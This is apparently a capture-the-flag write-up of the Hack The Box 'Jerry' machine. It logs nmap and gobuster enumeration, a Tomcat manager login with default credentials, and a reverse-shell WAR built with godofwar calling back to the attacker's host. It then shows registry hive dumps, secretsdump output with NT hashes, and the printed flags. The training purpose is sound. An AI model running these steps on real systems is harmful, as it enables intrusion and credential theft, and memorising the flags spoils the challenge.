User Exploit
Nmap Enumeration
Quick Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| ┌──(wzwr㉿kali)-[~/Documents/htb/jerry]
└─$ sudo nmap -sT -Pn -T4 -vv 10.10.10.95
[sudo] password for wzwr:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-24 02:59 CDT
Initiating Parallel DNS resolution of 1 host. at 02:59
Completed Parallel DNS resolution of 1 host. at 02:59, 0.01s elapsed
Initiating Connect Scan at 02:59
Scanning 10.10.10.95 [1000 ports]
Discovered open port 8080/tcp on 10.10.10.95
Completed Connect Scan at 03:00, 12.89s elapsed (1000 total ports)
Nmap scan report for 10.10.10.95
Host is up, received user-set (0.081s latency).
Scanned at 2025-04-24 02:59:58 CDT for 13s
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE REASON
8080/tcp open http-proxy syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 12.92 seconds
|
Full Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| ┌──(wzwr㉿kali)-[~/Documents/htb/jerry]
└─$ sudo nmap -sT -Pn -T4 -vv -p- 10.10.10.95
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-24 03:01 CDT
Initiating Parallel DNS resolution of 1 host. at 03:01
Completed Parallel DNS resolution of 1 host. at 03:01, 0.00s elapsed
Initiating Connect Scan at 03:01
Scanning 10.10.10.95 [65535 ports]
Discovered open port 8080/tcp on 10.10.10.95
Connect Scan Timing: About 14.49% done; ETC: 03:05 (0:03:03 remaining)
Connect Scan Timing: About 44.62% done; ETC: 03:03 (0:01:16 remaining)
Completed Connect Scan at 03:03, 106.03s elapsed (65535 total ports)
Nmap scan report for 10.10.10.95
Host is up, received user-set (0.063s latency).
Scanned at 2025-04-24 03:01:29 CDT for 106s
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE REASON
8080/tcp open http-proxy syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 106.05 seconds
|
UDP Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| ┌──(wzwr㉿kali)-[~/Documents/htb/jerry]
└─$ sudo nmap -sU -Pn -T4 -vv 10.10.10.95
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-24 03:04 CDT
Initiating Parallel DNS resolution of 1 host. at 03:04
Completed Parallel DNS resolution of 1 host. at 03:04, 0.00s elapsed
Initiating UDP Scan at 03:04
Scanning 10.10.10.95 [1000 ports]
UDP Scan Timing: About 30.50% done; ETC: 03:05 (0:01:11 remaining)
UDP Scan Timing: About 60.50% done; ETC: 03:05 (0:00:40 remaining)
Completed UDP Scan at 03:05, 101.31s elapsed (1000 total ports)
Nmap scan report for 10.10.10.95
Host is up, received user-set.
Scanned at 2025-04-24 03:04:09 CDT for 101s
All 1000 scanned ports on 10.10.10.95 are in ignored states.
Not shown: 1000 open|filtered udp ports (no-response)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 101.36 seconds
Raw packets sent: 2088 (98.552KB) | Rcvd: 0 (0B)
|
Port 8080 Enumeration
Manual Enumeration
seems like it is a apache tomcat web server.
Web Server Info
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| ┌──(wzwr㉿kali)-[~]
└─$ curl 10.10.10.95:8080 -v
* Trying 10.10.10.95:8080...
* Connected to 10.10.10.95 (10.10.10.95) port 8080
> GET / HTTP/1.1
> Host: 10.10.10.95:8080
> User-Agent: curl/8.8.0
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
< Content-Type: text/html;charset=ISO-8859-1
< Transfer-Encoding: chunked
< Date: Thu, 24 Apr 2025 14:42:57 GMT
|
SearchSploit Tomcat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| ┌──(wzwr㉿kali)-[~/Documents/htb/jerry]
└─$ searchsploit -m 42953
Exploit: Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1)
URL: https://www.exploit-db.com/exploits/42953
Path: /usr/share/exploitdb/exploits/windows/webapps/42953.txt
Codes: CVE-2017-12615
Verified: False
File Type: ASCII text
Copied to: /home/wzwr/Documents/htb/jerry/42953.txt
┌──(wzwr㉿kali)-[~/Documents/htb/jerry]
└─$ searchsploit -m 42966
Exploit: Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)
URL: https://www.exploit-db.com/exploits/42966
Path: /usr/share/exploitdb/exploits/jsp/webapps/42966.py
Codes: CVE-2017-12617
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/wzwr/Documents/htb/jerry/42966.py
|
Gobuster
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| ┌──(wzwr㉿kali)-[~/Documents/htb/jerry]
└─$ gobuster dir -u http://10.10.10.95:8080/ -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.95:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/[ (Status: 400) [Size: 0]
/] (Status: 400) [Size: 0]
/aux (Status: 200) [Size: 0]
/docs (Status: 302) [Size: 0] [--> /docs/]
/examples (Status: 302) [Size: 0] [--> /examples/]
/favicon.ico (Status: 200) [Size: 21630]
/manager (Status: 302) [Size: 0] [--> /manager/]
/plain] (Status: 400) [Size: 0]
/quote] (Status: 400) [Size: 0]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| ┌──(wzwr㉿kali)-[~/Documents/htb/jerry]
└─$ gobuster dir -u http://10.10.10.95:8080/ -w /usr/share/wordlists/SecLists-2024.4/Discovery/Web-Content/ApacheTomcat.fuzz.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.95:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists-2024.4/Discovery/Web-Content/ApacheTomcat.fuzz.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/examples (Status: 302) [Size: 0] [--> /examples/]
/examples/jsp/index.html (Status: 200) [Size: 17695]
/manager (Status: 302) [Size: 0] [--> /manager/]
/manager/text (Status: 401) [Size: 2536]
/manager/html/ (Status: 401) [Size: 2536]
/manager/jmxproxy (Status: 401) [Size: 2536]
/manager/status (Status: 401) [Size: 2536]
/manager/html (Status: 401) [Size: 2536]
/examples/jsp/snp/snoop.jsp (Status: 200) [Size: 618]
/examples/servlets/index.html (Status: 200) [Size: 7139]
/RELEASE-NOTES.txt (Status: 200) [Size: 9600]
/examples/jsp/source.jsp (Status: 500) [Size: 2387]
===============================================================
Finished
===============================================================
|
Default Credentials
By visiting /manager/html , we would knows there is an example at teaching about adding new users account to login as manager tomcat:s3cret, we can use this to login by visiting /manager
Authenticated Manager WebPage
Seems like we can upload WAR file and deploy it in web server instantly. By referencing https://github.com/KINGSABRI/godofwar, we can create a malicious reverse shell .war file
1
2
3
4
5
6
7
8
9
10
11
12
13
| ┌──(wzwr㉿kali)-[~/Documents/htb/jerry/ReverseShell]
└─$ godofwar -p reverse_shell -H 10.10.16.15 -P 58787 -o evil
[ ℹ ] Creating Directory Structure:
✔ evil
✔ evil/WEB-INF
✔ evil/META-INF
✔ evil/WEB-INF/web.xml
✔ evil/META-INF/MANIFEST.MF
[ ℹ ] Setting up payload:
✔ reverse_shell.jsp ⟿ evil.jsp
✔ evil/evil.jsp
[ ℹ ] Cleaning up
[ ✔ ] Backdoor evil.war has been created.
|
Then, we can visit /evil/evil.jsp to get the shell!
1
2
3
4
5
6
7
8
9
10
11
12
| ┌──(wzwr㉿kali)-[~/Documents/htb/jerry]
└─$ nc -lnvp 58787
listening on [any] 58787 ...
connect to [10.10.16.15] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
C:\apache-tomcat-7.0.88>
|
Root Exploit
WHOAMI
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
| C:\Users>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
|
Note that SeImpersonatePrivilege, SeDebugPrivilege, SeDebugPrivilege are set to this account. We might want to abuse them to exploit the server.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
| info
systeminfo
Host Name: JERRY
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-00112-46014-AA570
Original Install Date: 6/18/2018, 11:30:45 PM
System Boot Time: 4/24/2025, 5:39:30 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4,095 MB
Available Physical Memory: 3,410 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 4,094 MB
Virtual Memory: In Use: 705 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 142 Hotfix(s) Installed.
[01]: KB2868626
[02]: KB2883200
[03]: KB2887595
[04]: KB2894856
[05]: KB2903939
[06]: KB2911106
[07]: KB2919355
[08]: KB2919394
[09]: KB2928680
[10]: KB2938066
[11]: KB2954879
[12]: KB2967917
[13]: KB2977765
[14]: KB2978041
[15]: KB2978126
[16]: KB2989930
[17]: KB3000850
[18]: KB3003057
[19]: KB3004365
[20]: KB3004545
[21]: KB3012235
[22]: KB3012702
[23]: KB3013172
[24]: KB3013531
[25]: KB3013538
[26]: KB3013769
[27]: KB3013791
[28]: KB3013816
[29]: KB3014442
[30]: KB3015696
[31]: KB3018133
[32]: KB3019978
[33]: KB3021910
[34]: KB3023222
[35]: KB3023266
[36]: KB3024751
[37]: KB3024755
[38]: KB3029603
[39]: KB3030947
[40]: KB3032663
[41]: KB3033446
[42]: KB3035126
[43]: KB3036612
[44]: KB3037579
[45]: KB3037924
[46]: KB3038002
[47]: KB3042085
[48]: KB3044374
[49]: KB3044673
[50]: KB3045634
[51]: KB3045685
[52]: KB3045717
[53]: KB3045719
[54]: KB3045755
[55]: KB3045999
[56]: KB3046017
[57]: KB3046737
[58]: KB3054169
[59]: KB3054203
[60]: KB3054256
[61]: KB3054464
[62]: KB3055323
[63]: KB3055343
[64]: KB3055642
[65]: KB3059317
[66]: KB3060681
[67]: KB3060793
[68]: KB3061512
[69]: KB3063843
[70]: KB3071756
[71]: KB3074228
[72]: KB3074548
[73]: KB3076949
[74]: KB3077715
[75]: KB3078405
[76]: KB3078676
[77]: KB3080149
[78]: KB3082089
[79]: KB3084135
[80]: KB3084905
[81]: KB3086255
[82]: KB3087041
[83]: KB3087137
[84]: KB3091297
[85]: KB3094486
[86]: KB3095701
[87]: KB3097997
[88]: KB3098779
[89]: KB3099834
[90]: KB3100473
[91]: KB3102429
[92]: KB3103616
[93]: KB3103696
[94]: KB3103709
[95]: KB3109103
[96]: KB3109560
[97]: KB3109976
[98]: KB3110329
[99]: KB3115224
[100]: KB3121261
[101]: KB3121461
[102]: KB3123245
[103]: KB3126434
[104]: KB3126587
[105]: KB3133043
[106]: KB3133690
[107]: KB3134179
[108]: KB3134815
[109]: KB3137728
[110]: KB3138378
[111]: KB3138602
[112]: KB3138910
[113]: KB3138962
[114]: KB3139164
[115]: KB3139398
[116]: KB3139914
[117]: KB3140219
[118]: KB3140234
[119]: KB3145384
[120]: KB3145432
[121]: KB3146604
[122]: KB3146723
[123]: KB3146751
[124]: KB3147071
[125]: KB3155784
[126]: KB3156059
[127]: KB3159398
[128]: KB3161949
[129]: KB3162343
[130]: KB3172614
[131]: KB3172729
[132]: KB3173424
[133]: KB3175024
[134]: KB3178539
[135]: KB3179574
[136]: KB3185319
[137]: KB4033369
[138]: KB4033428
[139]: KB4054854
[140]: KB4096417
[141]: KB4287903
[142]: KB4284815
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) 82574L Gigabit Network Connection
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.95
[02]: fe80::8d36:6e0:6b60:31a3
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
|
Exploit
SeBackupPrivilege
Let try to abuse the most common SeBackupPrivilege first.
1
2
3
4
5
6
7
| C:\apache-tomcat-7.0.88>reg save hklm\system C:\apache-tomcat-7.0.88\webapps\docs\system.hive
reg save hklm\system C:\apache-tomcat-7.0.88\system.hive
The operation completed successfully.
C:\apache-tomcat-7.0.88>reg save hklm\sam C:\apache-tomcat-7.0.88\sam.hive
reg save hklm\sam C:\apache-tomcat-7.0.88\webapps\docs\sam.hive
The operation completed successfully.
|
Note that we save system/sam.hive to /webapps/docs as we can download it by visiting the endpoint /docs/system.hive and /docs/sam.hive.
1
2
3
4
5
6
7
8
9
| ┌──(wzwr㉿kali)-[~/Documents/htb/jerry]
└─$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x777873202c520da6e5ce6f10e419892b
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fe34b627386c89a49eb254f6a267e4d9:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
|
Final Exploit
Actually… we can just view the Administrator flags directly
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
| C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0834-6C04
Directory of C:\Users\Administrator\Desktop
06/19/2018 07:09 AM <DIR> .
06/19/2018 07:09 AM <DIR> ..
06/19/2018 07:09 AM <DIR> flags
0 File(s) 0 bytes
3 Dir(s) 2,395,463,680 bytes free
C:\Users\Administrator\Desktop>cd flags
cd flags
C:\Users\Administrator\Desktop\flags>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0834-6C04
Directory of C:\Users\Administrator\Desktop\flags
06/19/2018 07:09 AM <DIR> .
06/19/2018 07:09 AM <DIR> ..
06/19/2018 07:11 AM 88 2 for the price of 1.txt
1 File(s) 88 bytes
2 Dir(s) 2,395,463,680 bytes free
C:\Users\Administrator\Desktop\flags>type 2\ for\ the\ price\ of\ 1.txt
type 2\ for\ the\ price\ of\ 1.txt
C:\Users\Administrator\Desktop\flags>type *.txt
type *.txt
user.txt
7004dbcef0f854e0fb401875f26ebd00
root.txt
04a8b36e1545a455393d067e772fe90e
C:\Users\Administrator\Desktop\flags>
|
